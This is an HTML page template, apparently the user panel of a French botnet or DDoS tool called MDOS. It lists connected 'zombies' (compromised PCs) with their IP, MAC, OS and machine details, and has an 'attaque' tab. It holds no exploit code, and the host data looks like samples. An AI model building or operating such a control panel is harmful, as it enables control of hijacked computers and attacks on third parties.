<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>MDOS - Panneau utilisateur</title>
    <meta name="robots" content="Index,Follow" />
    <meta name="language" content="fr" />
    <meta http-equiv="imagetoolbar" content="no" />
    <link rel="stylesheet" type="text/css" href="user.css">
	<script type = "text/javascript">
	<!--
	function SwitchImage(id) {
		if (StrIsInStr(document.getElementById("switch"+id).src, "up.png")) {
			Effect.SlideUp("supinfo"+id);
			document.getElementById("switch"+id).src = 'down.png';
		}
		else {
			Effect.SlideDown("supinfo"+id);
			document.getElementById("switch"+id).src = 'up.png';
		}
	}
	function StrIsInStr(str1, str2) {
		if ((str1.indexOf (str2)) != -1) {
			return true;
		}
		else {
			return false;
		}
	}
	//-->
	</script>
	<script src="js/prototype.js" type="text/javascript"></script>
	<script src="js/scriptaculous.js" type="text/javascript"></script>
</head>

<body bgcolor="#FFFFFF">
<div id = "userbar" align = "right">
<a id = "contact" href = "mailto:&#114;&#101;&#100;&#098;&#117;&#115;&#116;&#064;&#104;&#111;&#116;&#109;&#097;&#105;&#108;&#046;&#102;&#114;">contact&nbsp;</a>
<a id = "forum" href = "">forum&nbsp;</a>
</div>
<div id = "postbar"><hr size = "1px" color = "#34BEED"</div>
<div id = "logo"><a  href = "%url%" ><img src="logo_final.png" alt = "MDOS"></a></div>
<div id = "bar"></div>
<div id = "tab"><img src = "zombtab.png" id = "tabimg"></div>
<div id = "active"><img src = "client_c.png" id = ""></div>
<div><a href="user.php?log=%info_log%&sid=%info_sid%&tab=attack"><img src = "attaque_a.png"  onmouseover = "this.src='attaque_h.png'" onmouseout = "this.src = 'attaque_a.png'"></a></div>
<div><a href="user.php?log=%info_log%&sid=%info_sid%&tab=log"><img src = "log_a.png"  onmouseover = "this.src='log_h.png'" onmouseout = "this.src = 'log_a.png'"></a></div>
<div id = "wrapper"></div>
<div id = "zomblist">
<span class = "title">Zombies connectés</br>
<img src = "splitbar.png"></span>
<div class = "zombbar">
<img id = "switch1" class = "updown" src = "down.png" onclick="SwitchImage('1');">
<img class = "flag" src = "flag/france.png">
<img class = "os" src = "os/wvista.png">
<div class = "ip">192.12.10.1</div>
<div class = "macadr">FF:FF:FF:FF:FF:FF</div>
</div>
<div id = "supinfo1" class = "supinfo" style = "display:none;">
<div class = "suptext"><b>PCNAME :</b> ORDI_JOJO</br>
<b>LOCALGATEWAY :</b> 192.138.10.1</br>
<b>SECURE ID :</b> <font color = "green">d6aa97d33d459ea3670056e737c99a3d</font></br>
<b>ACTIVE RAM DETECTED :</b> 500MO</br>
<b>OS DETECTED :</b> Windows Vista</div></br>
</div>
<div class = "zombbar">
<img id = "switch2" class = "updown" src = "down.png" onclick="SwitchImage('2');">
<img class = "flag" src = "flag/vietnam.png">
<img class = "os" src = "os/wxp.png">
<div class = "ip">75.136.15.1</div>
<div class = "macadr">FF:FF:FF:FF:FF:FF</div>
</div>
<div id = "supinfo2" class = "supinfo" style = "display:none;">
<div class = "suptext"><b>PCNAME :</b> WORK</br>
<b>LOCALGATEWAY :</b> 197.132.18.1</br>
<b>SECURE ID :</b> <font color = "green">d6aaed45f2c6d7a3670056e737c99a3d</font></br>
<b>ACTIVE RAM DETECTED :</b> 1000MO</br>
<b>OS DETECTED :</b> Windows XP</div></br>
</div>
</div>
</body>
</html>